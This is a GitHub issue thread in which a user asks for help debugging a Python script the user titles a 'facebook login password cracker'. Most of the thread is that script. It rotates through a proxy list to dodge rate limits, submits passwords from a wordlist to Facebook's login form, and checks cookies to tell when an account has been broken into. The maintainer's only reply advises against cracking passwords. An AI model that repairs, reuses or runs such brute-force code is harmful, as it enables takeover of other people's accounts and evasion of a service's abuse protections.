### ISSUE TITLE
Python facebook login password cracker

### ISSUE THREAD

**Issue by Programmer1061** [Schmavery/facebook-chat-api#733]
So i have a script that lets you login to facebook .. and i tested my code out and i put my username and password in the code and ran it and it said password was wrong but when i entered the exact username and password in facebook.com/login in the web browser it let me in .. i even tried not using a proxy as well and using it to .. i even tried uninstalling python idle .. can anyone help me? im using mechanize i did you robo browser as well .

**Comment by Programmer1061** [comment]
import sys, os, random, mechanize, cookielib,threading

from bs4 import BeautifulSoup
import requests
from time import sleep
from words.easyguessing import testing

br = mechanize.Browser()
cj = cookielib.LWPCookieJar()
br.set_handle_robots(False)
br.set_handle_equiv(True)
br.set_handle_referer(True)
br.set_handle_redirect(True)
br.set_cookiejar(cj)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)

url = 'https://www.facebook.com/login/device-based/regular/login/?login_attempt=1&lwv=100'

checkip = "https://httpbin.org/ip"

headers = {
	'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36',
}

br.addheaders = [('User-Agent',headers['User-Agent'])]

def proxy():
    with open(r'C:\Users\User\Documents\Proxies\proxylist.txt','r') as f:
        for line in f:
            cleanedLine = line.strip()
            if cleanedLine:
                yield cleanedLine
       # print('Ran out of proxies')
       # quit()








def testing(): #We use this to test
    with open(r"C:\Users\User\Documents\wordlist/testing.txt",'r') as f:
        for line in f:
            cleanedLine = line.strip()
            if cleanedLine:
                yield str(cleanedLine)
        

class ThreadingExample(object):
   

    def __init__(self, interval=20):
        
     
        self.interval = interval

        thread = threading.Thread(target=self.run, args=())
        
        thread.daemon = True                            # Daemonize thread
        thread.start()                                  # Start the execution

    def run(self):
        while True:
            for l in proxy():

                proxydata = {
                    'http':'http://'+l,
                    'https':'http://'+l
                    }
               
                try:
                    get= requests.get(checkip,proxies=proxydata,timeout=3)
                    

                    br.set_proxies(proxies=proxydata)
             
                    
     

                except Exception:
       
                    continue

                  
                sleep(self.interval)

        

  
           

 
        

example = ThreadingExample()












br.open(url)

def login(user=None,passw=None):

    br.select_form(nr=0)

    br.form['email'] = 'example@gmail.com'

    br.form['pass'] = 'examplepassword'

    resp = br.submit()

   

    soup = BeautifulSoup(resp.read(), 'html.parser')


    #getTitle = soup.title.text
    f = soup.find("div", {"class": "fsl fwb fcb"})
    try:
        ff = f.string
        print ff

    except Exception:pass

   # if ff == 'Please try again later':return 'Error'



    d  =str(cj._cookies)
    print d

    check_point = d.find('checkpoint')
    

    user_cookie = d.find('c_user')

    if check_point != -1:return True

    if user_cookie != -1:return True

    print check_point, user_cookie

   # if user_cookie or check_point:
        
    #    print True


for t in testing():
    if len(t) >= 6:
        try:
            obj = login(user,t)

        except Exception:pass
        else:
            print t
            if obj == True:
                print 'pass is:',t

            while obj == 'Error':
                
                try:
                    stuck = login(user,t)
                    if stuck != 'Error':break

                except Exception:pass

**Comment by Schmavery** [comment]
I don't know what's going on here, but I would uh advise not trying to crack fb passwords.
